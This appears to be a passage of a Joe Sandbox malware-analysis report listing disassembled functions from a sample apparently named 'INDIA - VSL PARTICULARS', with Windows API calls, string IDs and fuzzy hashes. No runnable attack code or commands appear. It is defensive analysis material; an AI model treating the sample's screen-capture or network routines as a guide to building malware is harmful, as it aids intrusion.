                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: InfoItemMenu$Sleep
                              • String ID: 0
                              • API String ID: 1196289194-4108050209
                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                              Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(00000000), ref: 0043143E
                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                              • SelectObject.GDI32(00000000,?), ref: 00431466
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                              • String ID: (
                              • API String ID: 3300687185-3887548279
                              • Opcode ID: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                              • Opcode Fuzzy Hash: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                              Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 1976180769-4113822522
                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                              Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                              • String ID:
                              • API String ID: 461458858-0
                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                              Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                              • DeleteObject.GDI32(?), ref: 004301D0
                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                              • String ID:
                              • API String ID: 3969911579-0
                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                              Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                              • String ID: 0
                              • API String ID: 956284711-4108050209
                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                              Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 1965227024-3771769585
                              • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                              • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                              Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: SendString$_memmove_wcslen
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 369157077-1007645807
                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                              Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32 ref: 00445BF8
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                              • __wcsicoll.LIBCMT ref: 00445C33
                              • __wcsicoll.LIBCMT ref: 00445C4F
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$ClassMessageNameParentSend
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 3125838495-3381328864
                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                              Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$CharNext
                              • String ID:
                              • API String ID: 1350042424-0
                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                              Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                              • _wcscpy.LIBCMT ref: 004787E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 3052893215-2127371420
                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                              Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                              • __swprintf.LIBCMT ref: 0045E7F7
                              • _wprintf.LIBCMT ref: 0045E8B3
                              • _wprintf.LIBCMT ref: 0045E8D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-2354261254
                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                              Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __swprintf_wcscpy$__i64tow__itow
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 3038501623-2263619337
                              • Opcode ID: 938062b866bf0b218a40f47176acdf1de3dbe8e0b1755ce811117c76df3177ab
                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                              • Opcode Fuzzy Hash: 938062b866bf0b218a40f47176acdf1de3dbe8e0b1755ce811117c76df3177ab
                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                              Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                              • __swprintf.LIBCMT ref: 0045E5F6
                              • _wprintf.LIBCMT ref: 0045E6A3
                              • _wprintf.LIBCMT ref: 0045E6C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-8599901
                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                              Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • timeGetTime.WINMM ref: 00443B67
                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                              • IsWindow.USER32(00000000), ref: 00443C3A
                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
